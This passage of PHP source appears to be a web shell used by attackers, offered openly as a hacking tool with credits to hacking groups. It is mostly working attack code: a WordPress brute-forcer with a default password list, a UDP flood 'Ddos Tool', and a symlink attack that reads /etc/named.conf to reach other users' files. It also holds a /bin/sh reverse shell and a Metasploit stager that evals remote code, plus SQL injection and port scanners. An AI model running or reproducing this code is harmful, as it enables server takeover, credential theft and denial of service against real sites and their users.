"/";\r\nif($_POST[\'xploit_404string\'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");\r\n$list[\'end\'] = str_replace("\\r", "", $list[\'end\']);\r\n$list[\'front\'] = str_replace("\\r", "", $list[\'front\']);\r\n$pathes = explode("\\n", $list[\'end\']);\r\n$frontpathes = explode("\\n", $list[\'front\']);\r\nshow(count($pathes)+count($frontpathes), 1, 0, \'total\', 1);\r\n$verificate = 0;\r\nforeach($pathes as $path) {\r\n    show(\'Checking \'.$site.$path.\' : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($path) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="\'.$site.$path.\'">\'.$site.$path.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n}\r\npreg_match("/\\/\\/(.*?)\\//i", $site, $xx); $site = $xx[1];\r\nif(substr($site, 0, 3) == "www") $site = substr($site, 4);\r\nforeach($frontpathes as $frontpath) {\r\n    show(\'Checking http://\'.$frontpath.\'.\'.$site.\'/ : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($frontpath, 1) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="http://\'.$frontpath.\'.\'.$site.\'/">\'.$frontpath.\'.\'.$site.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n   \r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wpbrute\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wpbrute" method="post">\r\n<center>\r\n<br><Br><b><font size=\'2\' >+--=[ Wordpress Brute Force ]=--+</font><br>\r\n<center><p>Tanks To <a href="https://www.facebook.com/anton115" target="_blank">Cah_bagus</a></p></b></center>\r\n<form enctype="multipart/form-data" method="POST">\r\n  <table width=\'624\' border=\'0\' class=\'tabnet\' id=\'Box\'>\r\n  <tr><th colspan="5">Wordpress Brute Force</th></tr>\r\n    \r\n\r\n    <tr>\r\n      <td >&nbsp;</td>\r\n      <td ><p>Hosts:</p></td>\r\n      <td ><p> Users:</p></td>\r\n      <td ><p>Passwords:</p></td>\r\n    </tr>\r\n    <tr>\r\n      <td>&nbsp;</td>\r\n      <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST[\'hosts\'];} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'usernames\'];}else {echo "admin";} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'passwords\'];}else {echo "admin\\nadministrator\\n123123\\n123321\\n123456\\n1234567\\n12345678\\n123456789\\n123456123456\\nadmin2010\\nadmin2011\\npassword\\nP@ssW0rd\\n!@#$%^\\n!@#$%^&*(\\n(*&^%$#@!\\n111111\\n222222\\n333333\\n444444\\n555555\\n666666\\n777777\\n888888\\n999999";} ?></textarea></td>\r\n    </tr>\r\n<tr><td colspan="4"><input class=\'inputzbut\' type="submit" name="submit" value="Brute Now"  />\r\n<?php\r\nif($_POST)\r\n{\r\n\t$hosts = trim(filter($_POST[\'hosts\']));\r\n\t$passwords = trim(filter($_POST[\'passwords\']));\r\n\t$usernames = trim(filter($_POST[\'usernames\']));\r\n\r\n\tif($passwords && $usernames && $hosts)\r\n\t{\r\n\t\t$hosts_explode = explode("\\n", $hosts);\r\n\t\t$usernames_explode = explode("\\n", $usernames);\r\n    \t$passwords_explode = explode("\\n", $passwords);\r\n\r\n\t\tforeach($hosts_explode as $host)\r\n\t\t{\r\n\t\t\t$host = RemoveLastSlash($host);\r\n\t\t\t$hacked = 0;\r\n\t\t\t$host = str_replace(array("http://","https://","www."),"",trim($host));\r\n\t\t\t$host = "http://".$host;\r\n\t\t\t$wpAdmin = $host.\'/wp-admin/\';\r\n\r\n\t\t\tif(!url_exists($host."/wp-login.php"))\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Error In Login Page !</font></p>";ob_flush();flush();continue;}\r\n\r\n\t\t\tforeach($usernames_explode as $username)\r\n\t\t\t{\r\n\t\t\t\tforeach($passwords_explode as $password)\r\n\t\t\t\t{\r\n\t\t\t\t\t$ch   =     curl_init();\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_URL,$host.\'/wp-login.php\');\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POST,TRUE);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");\r\n\t\t\t\t\t$login    =\t   curl_exec($ch);\r\n\r\n\t\t\t\t\tif(eregi ("profile.php",$login) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$hacked = 1;\r\n\t\t\t\t\t\techo "<p>".$host." => UserName : [<font color=\'green\'>".$username."</font>] : Password : [<font color=\'green\'>".$password."</font>]</p>";\r\n\t\t\t\t\t\tob_flush();flush();break;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif($hacked == 1){break;}\r\n\t\t\t}\r\n\t\t\tif($hacked == 0)\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Failed !</font></p>";ob_flush();flush();}\r\n\t\t}\r\n\t}\r\n\telse {echo "<p><font color=\'red\'>All fields are Required ! </font></p>";}\r\n}\r\n?>\r\n</td></tr>\r\n</table></form></center>\r\n<?php\r\nfunction url_exists($strURL)\r\n{\r\n    $resURL = curl_init();\r\n    curl_setopt($resURL, CURLOPT_URL, $strURL);\r\n    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);\r\n    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, \'curlHeaderCallback\');\r\n    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);\r\n    curl_exec ($resURL);\r\n    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);\r\n    curl_close ($resURL);\r\n    if ($intReturnCode != 200){return false;}\r\n\telse{return true ;}\r\n}\r\nfunction filter($string)\r\n{\r\n\tif(get_magic_quotes_gpc() != 0){return stripslashes($string);\t}\r\n\telse{return $string;\t}\r\n}\r\nfunction RemoveLastSlash($host)\r\n{\r\n\tif(strrpos($host, \'/\', -1) == strlen($host)-1)\r\n\t{return substr($host,0,strrpos($host, \'/\', -1));}\r\n\telse{return $host;}\r\n}\r\necho "</p>";\r\n}\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dos\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">\r\n<center><br><br><br>\r\nYour IP: <font color="red"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don\'t DoS yourself nub)<br><br>\r\n<table class="tabnet" style="width:333px;padding:0 1px;">\r\n<th colspan="5">Ddos Tool</th>\r\n<tr><tr><td>IP Target</td><td>:</td>\r\n<td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value==\'\' ) this.value = \'0.0.0.0\';" onfocus = " if ( this.value == \'0.0.0.0\' ) this.value = \'\';"/>\r\n</td></tr>\r\n<tr><td>Time</td><td>:</td>\r\n<td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value==\'\' ) this.value = \'time (in seconds)\';" onfocus = " if ( this.value == \'time (in seconds)\' ) this.value = \'\';"/>\r\n</td></tr>\r\n\r\n<tr><td>Port</td><td>:</td>\r\n<td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value==\'\' ) this.value = \'port\';" onfocus = " if ( this.value == \'port\' ) this.value = \'\';"/>\r\n</td></tr></tr></table></b><br>\r\n<input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">\r\n<br><br>\r\n<center>\r\nAfter initiating the DoS attack, please wait while the browser loads.\r\n</center>\r\n\r\n</form>\r\n</center>\r\n<?php\r\n$submit = $_POST[\'fire\'];\r\nif (isset($submit)) {\r\n\r\n$packets = 0;\r\n$ip = $_POST[\'ip\'];\r\n$rand = $_POST[\'port\'];\r\nset_time_limit(0);\r\nignore_user_abort(FALSE);\r\n\r\n$exec_time = $_POST[\'time\'];\r\n\r\n$time = time();\r\nprint "Flooded: $ip on port $rand <br><br>";\r\n$max_time = $time+$exec_time;\r\n\r\n\r\n\r\nfor($i=0;$i<65535;$i++){\r\n        $out .= "X";\r\n}\r\nwhile(1){\r\n$packets++;\r\n        if(time() > $max_time){\r\n                break;\r\n        }\r\n        \r\n        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);\r\n        if($fp){\r\n                fwrite($fp, $out);\r\n                fclose($fp);\r\n        }\r\n}\r\necho "Packet complete at ".time(\'h:i:s\')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \\n";\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'symlink\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">\r\n\r\n<?php   \r\n\r\n@set_time_limit(0);\r\n\r\necho "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";\r\n\r\n@mkdir(\'sym\',0777);\r\n$htaccess  = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n  AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n$write =@fopen (\'sym/.htaccess\',\'w\');\r\nfwrite($write ,$htaccess);\r\n@symlink(\'/\',\'sym/root\');\r\n$filelocation = basename(__FILE__);\r\n$read_named_conf = @file(\'/etc/named.conf\');\r\nif(!$read_named_conf)\r\n{\r\necho "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; \r\n}\r\nelse\r\n{\r\necho "<br><br><div class=\'tmp\'><table border=\'1\' bordercolor=\'#00ff00\' width=\'500\' cellpadding=\'1\' cellspacing=\'0\'><td>Domains</td><td>Users</td><td>symlink </td>";\r\nforeach($read_named_conf as $subject){\r\nif(eregi(\'zone\',$subject)){\r\npreg_match_all(\'#zone "(.*)"#\',$subject,$string);\r\nflush();\r\nif(strlen(trim($string[1][0])) >2){\r\n$UID = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$string[1][0]));\r\n$name = $UID[\'name\'] ;\r\n@symlink(\'/\',\'sym/root\');\r\n$name   = $string[1][0];\r\n$iran   = \'\\.ir\';\r\n$israel = \'\\.il\';\r\n$indo   = \'\\.id\';\r\n$sg12   = \'\\.sg\';\r\n$edu    = \'\\.edu\';\r\n$gov    = \'\\.gov\';\r\n$gose   = \'\\.go\';\r\n$gober  = \'\\.gob\';\r\n$mil1   = \'\\.mil\';\r\n$mil2   = \'\\.mi\';\r\n$malay\t= \'\\.my\';\r\n$china\t= \'\\.cn\';\r\n$japan\t= \'\\.jp\';\r\n$austr\t= \'\\.au\';\r\n$porn\t= \'\\.xxx\';\r\n$as\t\t= \'\\.uk\';\r\n$calfn\t= \'\\.ca\';\r\n\r\nif (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])\r\nor eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])\r\nor eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])\r\nor eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))\r\n{\r\n$name = "<div style=\' color: #FF0000 ; text-shadow: 0px 0px 1px red; \'>".$string[1][0].\'</div>\';\r\n}\r\necho "\r\n<tr>\r\n\r\n<td>\r\n<div class=\'dom\'><a target=\'_blank\' href=http://www.".$string[1][0].\'/>\'.$name.\' </a> </div>\r\n</td>\r\n\r\n<td>\r\n\'.$UID[\'name\']."\r\n</td>\r\n\r\n<td>\r\n<a href=\'sym/root/home/".$UID[\'name\']."/public_html\' target=\'_blank\'>Symlink </a>\r\n</td>\r\n\r\n</tr></div> ";\r\nflush();\r\n}\r\n}\r\n}\r\n}\r\n\r\necho "</center></table>";   \r\n\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'domain\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=domain" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>\';\r\n\r\n$file = @implode(@file("/etc/named.conf"));\r\nif(!$file){ die("# can\'t ReaD -> [ /etc/named.conf ]"); }\r\npreg_match_all("#named/(.*?).db#",$file ,$r);\r\n$domains = array_unique($r[1]);\r\n//check();\r\n//if(isset($_GET[\'ShowAll\']))\r\n{\r\necho "<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>\r\n<tr><td>Domain</td><td>User</td></tr>";\r\nforeach($domains as $domain){\r\n$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));\r\n\r\n\t\techo "<tr><td>$domain</td><td>".$user[\'name\']."</td></tr>";\r\n\t\t}\r\n\techo "</table>";\r\n\t}\r\n\r\necho \'</div>\';\r\n}\r\n//////////////////////////////////////////////////////\r\n/////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tool\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=tool" method="post">\r\n<?php\r\n\r\nerror_reporting(0);\r\nfunction ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}\r\n$s_my_ip = gethostbyname($_SERVER[\'HTTP_HOST\']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class=\'mybox\' align=\'center\'><td><h2>Reverse shell ( php )</h2><form method=\'post\' actions=\'?y=<?php echo $pwd;?>&amp;x=\'tool\'><table class=\'tabnet\'><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'rstarget4\' value=\'".$rstarget4."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'sqlportb4\' value=\'".$rsportb4."\' /></td></tr></table><input type=\'submit\' name=\'xback_php\' class=\'inputzbut\' value=\'connect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\' /><input type=\'hidden\' name=\'d\' value=\'".$pwd."\' /></form></td><td><hr color=\'#4C83AF\'><td><td><form method=\'POST\'><table class=\'tabnet\'><h2>Metasploit Connection </h2><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'40\' name=\'yip\' value=\'".$my_ip."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'5\' name=\'yport\' value=\'443\' /></td></tr></table><input class=\'inputzbut\' type=\'submit\' value=\'Connect\' name=\'metaConnect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\'></form></td></div></center></table><br><br />";\r\necho $s_result;\r\nif($_POST[\'metaConnect\']){$ipaddr = $_POST[\'yip\'];$port = $_POST[\'yport\'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable(\'stream_socket_client\')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = \'stream\';}elseif (is_callable(\'fsockopen\')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = \'stream\';}elseif (is_callable(\'socket_create\')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = \'socket\';}else {die();}switch ($msgsock_type){case \'stream\': $len = fread($msgsock, 4); break;case \'socket\': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a[\'len\'];$buffer = \'\';while (strlen($buffer) < $len){switch ($msgsock_type) {case \'stream\': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case \'socket\': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}\r\nif(isset($_REQUEST[\'sqlportb4\'])) $rsportb4 = ss($_REQUEST[\'sqlportb4\']);\r\nif(isset($_REQUEST[\'rstarget4\'])) $rstarget4 = ss($_REQUEST[\'rstarget4\']);\r\nif ($_POST[\'xback_php\']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = \'/bin/sh\';$daemon = 0;$debug = 0;if(function_exists(\'pcntl_fork\')){$pid = pcntl_fork();\r\nif ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}\r\numask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);\r\n$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\r\n$process = proc_open($shell, $descriptorspec, $pipes);\r\nif(!is_resource($process)) exit(1);\r\nstream_set_blocking($pipes[0], 0);\r\nstream_set_blocking($pipes[1], 0);\r\nstream_set_blocking($pipes[2], 0);\r\nstream_set_blocking($sock, 0);\r\nwhile(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\nif(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}\r\nif(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}\r\nif(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}\r\n}\r\n////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whois\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">\r\n   <?php\r\n   @set_time_limit(0);\r\n   @error_reporting(0);\r\n   function sws_domain_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/whois/$site");\r\n   flush();\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_net_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/asinfo/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_site_ser($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/reverseip/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_sup_dom($site)\r\n   {\r\n   $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");\r\n   $ip = @findit($getip,\'<strong>Nameservers found:</strong>\',\'<script type="text/javascript">\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_port_scan($ip)\r\n   {\r\n   $list_post = array(\'80\',\'21\',\'22\',\'2082\',\'25\',\'53\',\'110\',\'443\',\'143\');\r\n   foreach ($list_post as $o_port)\r\n   {\r\n   $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);\r\n   if($connect)\r\n   {\r\n   echo " $ip : $o_port ??? <u style=\\"color: #00ff00\\">Open</u> <br /><br />";\r\n   flush();\r\n   }\r\n   }\r\n   }\r\n   function findit($mytext,$starttag,$endtag) {\r\n   $posLeft = @stripos($mytext,$starttag)+strlen($starttag);\r\n   $posRight = @stripos($mytext,$endtag,$posLeft+1);\r\n   return @substr($mytext,$posLeft,$posRight-$posLeft);\r\n   flush();\r\n   }\r\n   echo \'<br><br><center>\';\r\n   echo \'\r\n    <br />\r\n    <div class="sc"><form method="post"><table class="tabnet">\r\n\t<tr><th colspan="5">Website Whois</th></tr>\r\n    <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>\r\n    </table></form></div>\';\r\n   if(isset($_POST[\'scan\']))\r\n   {\r\n   $site = @htmlentities($_POST[\'site\']);\r\n   if (empty($site)){die(\'<br /><br /> Not add IP .. !\');}\r\n   $ip_port = @gethostbyname($site);\r\n   echo "\r\n   <br /><div class=\\"sc2\\">Scanning [ $site ip $ip_port ] ... </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Port Server ------------------| <br /></div>\r\n   <div class=\\"ru\\"> <br /><br /><pre>\r\n   ";\r\n   echo "".sws_port_scan($ip_port)." </pre></div> ";\r\n   flush();\r\n   echo "<div class=\\"tit\\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_domain_info($site)."</pre></div>";\r\n   flush();\r\n   echo "\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Network Info ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_net_info($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_sup_dom($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- Site Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_site_ser($site)."</pre> </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- END ------------------| <br /></div>";\r\n   flush();\r\n   }\r\n   echo \'</center>\';\r\n   }\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'about\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=about" method="post">\r\n\t<center><br><br><img src=\'http://i.imgur.com/3m7leCw.jpg\'>\r\n    <br><br><br>terimakasih buat teman2 ku yang mau membantu saya menyelesaikan shell saya yang versi v3.1 spesial edition ini\r\n\t<br><br>[ s4mp4h | areg noid | Mr Gãndrunx (Hiddenymouz) | ardan | FH04ZA | antonio HSH | war0x | x shadow | bagonk ]<br>dan semua kawan-kawan ku\r\n\t<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>\r\n<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>\r\n<p><b><font size="3" color="#00ff00">=[ teman-temanku ]=<br><br>Gabby<br>Antonio HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>\r\nUyap<br>\r\nZinbad<br>FH04ZA<br>\r\nSani marpic<br>\r\nMadan Cyber<br>\r\nCah Bagus<br>\r\nRPG<br>Vallent<br>\r\nP4njie_a.k.a<br>\r\nDwi Syntia<br>\r\nÆrul Ringgo\'s<br>\r\nTi\'ar Variabel<br>\r\nImei7<br>\r\nHmei7<br>\r\nDe Vinclous<br>\r\nBlankon33<br>\r\nDoza Cracker<br>\r\nYing Cracker<br>\r\nIranian Hacker<br>\r\nDanger Hacker<br>\r\nAdmin07<br>\r\nZhou you<br>\r\nKsatria.us<br>\r\nCyber Inj3cti0n<br>\r\nK2ll33d<br>\r\nSultan Haikal<br>\r\nSyntax_Error<br>\r\nAqis<br>\r\nBlack Shadow<br>\r\ncrack999<br>\r\nFnatic Crew<br>\r\nCoretan Rizal<br>\r\nMalaikat Maut<br>\r\nDan teman-teman ku semua<br><br>\r\n=[ grup hacking ]=<br><br>\r\nBlack Newbie Team<br>\r\n3xpire Cyber Army<br>\r\nHack Forum<br>\r\nIndonesia Fighter Cyber<br>\r\nBiang Kerox Team<br>\r\nAnonymous<br>Gaza Hacker<br>Albanian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>\r\nX-Code<br>\r\nIndonesian Security<br>\r\nIndonesia Black Cyber<br>\r\nB-Compi<br>\r\nJasakom<br>\r\nMojopahit Fighter Cyber<br>\r\nLappis<br>\r\nMojopahit Cyber Dark<br>\r\nCrack Hack Forum<br>\r\ndan semua grup hacking<br>\r\nyang<br>\r\nsaya naungi dan singgahi<br><br><br>By<br>Cyber173 a.k.a X\'1n73ct<br><br><br>\r\n</font></b></p>\r\n</center>\r\n</marquee></center><br><br><br>\r\n<?php\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sqli-scanner\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> &nbsp;&nbsp;<input class="inputz" type="text" value="" name="dork" style="color:#00ff00;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan"></form></center>\';\r\n\r\nob_start();\r\nset_time_limit(0);\r\n\r\nif (isset($_POST[\'scan\'])) {\r\n\r\n$browser = $_SERVER[\'HTTP_USER_AGENT\'];\r\n\r\n$first = "startgoogle.startpagina.nl/index.php?q=";\r\n$sec = "&start=";\r\n$reg = \'/<p class="g"><a href="(.*)" target="_self" onclick="/\';\r\n\r\nfor($id=0 ; $id<=30; $id++){\r\n$page=$id*10;\r\n$dork=urlencode($_POST[\'dork\']);\r\n$url = $first.$dork.$sec.$page;\r\n\r\n$curl = curl_init($url);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\n$result = curl_exec($curl);\r\ncurl_close($curl);\r\n\r\npreg_match_all($reg,$result,$matches);\r\n}\r\nforeach($matches[1] as $site){\r\n\r\n$url = preg_replace("/=/", "=\'", $site);\r\n$curl=curl_init();\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1);\r\ncurl_setopt($curl,CURLOPT_URL,$url);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\ncurl_setopt($curl,CURLOPT_TIMEOUT,\'5\');\r\n$GET=curl_exec($curl); \r\nif (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * \r\n\r\nFROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { \r\necho \'<center><b><font color="#E10000">Found : </font><a href="\'.$url.\'" target="_blank">\'.$url.\'</a><font color=#FF0000> &#60;-- SQLI Vuln \r\n\r\nFound..</font></b></center>\';\r\nob_flush();flush(); \r\n}else{ \r\necho \'<center><font color="#FFFFFF"><b>\'.$url.\'</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>\';\r\nob_flush();flush(); \r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ \r\nif(isset($_POST[\'uploadcomp\'])){\r\n\tif(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){\r\n\t\t$path = magicboom($_POST[\'path\']);\r\n\t\t$fname = $_FILES[\'file\'][\'name\'];\r\n\t\t$tmp_name = $_FILES[\'file\'][\'tmp_name\'];\r\n\t\t$pindah = $path.$fname;\r\n\t\t$stat = @move_uploaded_file($tmp_name,$pindah);\t\t\r\n\t\tif ($stat) {\r\n\t\t\t$msg = "file uploaded to $pindah";\r\n\t\t}\r\n\t\telse $msg = "failed to upload $fname";\r\n\t}\r\n\telse $msg = "failed to upload $fname";\r\n}\r\nelseif(isset($_POST[\'uploadurl\'])){\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$path = magicboom($_POST[\'path\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\t$pindah = $path.$namafile;\r\n\tif(is_file($pindah)) {\r\n\t\t$msg = "file uploaded to $pindah";\r\n\t}\r\n\telse $msg = "failed to upload $namafile";\r\n\r\n}\r\n?>\r\n<form action="?y=<?php echo 